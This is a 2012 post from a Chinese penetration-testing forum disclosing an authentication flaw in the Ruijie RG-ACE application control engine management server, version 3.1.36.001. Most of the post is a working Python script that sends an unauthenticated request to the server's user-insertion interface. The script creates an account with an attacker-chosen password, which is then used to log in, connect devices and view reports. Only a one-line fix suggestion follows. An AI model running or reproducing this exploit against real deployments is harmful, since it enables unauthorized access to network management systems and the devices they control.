找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2046|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)# [# K* m$ G' H1 @1 x3 L% T
0 u1 R# {" C7 h, I
- z1 j' _6 G+ |( K
测试的具体版本是
! |, x; w! h5 ^4 x产品名称: 锐捷应用控制引擎! G: b: q' R* f/ ?% M
版本号: 3.1.36.001 TC
6 r" \$ u9 D) i( ?+ @& k编译时间: 2011042917302 j' n; g% ]/ L3 `- J
* k4 j7 M  l7 n; ~

. e. E4 m8 f; i+ E( r% j漏洞证明:* Y$ ~: l9 a6 P9 p- W% M
* N+ w  [, i$ c# C! T: E3 H
. [& c1 `( u4 e! _
# n) f7 {# O! a  K) a( e4 B
6 Q, K7 S) V6 t7 Q  F8 U7 E
7 `) @: R8 s; H: k. e) ~
+ K$ x4 M% f$ _1 m) F$ t' m# |
执行脚本9 ]9 X6 g- {9 `% J
#! /usr/bin/env python" ]2 B% f8 g6 Q1 T3 k. M4 T
#coding=gbk/ V) G- i6 `4 ]' d# V1 g# U6 @
#RG-ACE管理服务器 V3.1.36.001% \* G# f) n+ w  Q8 H
import urllib2, urllib,cookielib3 m) ?0 B: [6 g5 @+ X
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP* K- k* y- Z7 ^8 D+ B8 h+ W
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
' M3 @$ _+ s5 ^& `opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]6 o  [9 u5 i$ p
post=(("event","userManager.doInsertUserInfo"),7 Q1 R5 Z/ B( n
("useractionname","addButtonValue"),1 j0 B" B! D9 o0 V$ y- T
("useropermanager","userManager"),7 g; ]# _# d8 ~6 G4 |6 J4 j( K
("userName","t"), #######账号自己加
/ P% I9 @) D" O" W: V9 n6 i. Q("pwd","aaaaaa"),######密码自己加
" G+ U; ^- Z: `  J("trueName","ad"),( N4 M8 }8 @+ S/ s1 j# D7 n
("email",""),& M+ l# |5 q8 E
("mobilePhone",""),. H+ b; U7 O, W0 L
("officePhone",""),$ \( ~  t& O5 h- u, S7 {" K6 u' l$ X
("addr",""),' s( _" O% I: F; G& X3 R9 y$ F! K
("submit","确定"))
( Q2 p1 [% r' |( }7 V- R0 rurllib2.install_opener(opener)1 o3 d5 x6 m) C# w- {5 p' K
p=urllib2.urlopen(url, urllib.urlencode(post)).read(), c( o/ e; U4 Y9 j2 k+ S* A
print "Done"
5 F% Y$ |" m! t1 Q. R$ s: |& p$ x+ r' p
登录,连接设备: U/ i( w7 y- s$ r+ n

: ~+ |+ `# Z3 c4 Z0 F; O" E% r0 b- h% |4 y4 K. h# ?4 ^
1 p/ A( p1 z0 z$ I8 j* \6 b
- c! w, E4 w3 T; x$ C8 `7 k. e  D* n

! ?; G9 K* U, N7 M3 w默认的管理员admin权限更大点) Z# U/ j/ k% r( A$ {. Q7 \

* z" v: U7 i! m* w* T$ p% J+ C
1 X6 J! V: G  |- G$ D1 v0 ]& T! x; P& w/ W% F4 q: C

+ J' W) }' k% A7 f3 C) R3 ?/ |7 J; ^! |0 O
修复方案:5 m7 g3 ^8 [+ |
加强对接口的权限验证) U. u% X- x4 i8 G
/ o5 T. [4 b6 ]6 E& Z9 O
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表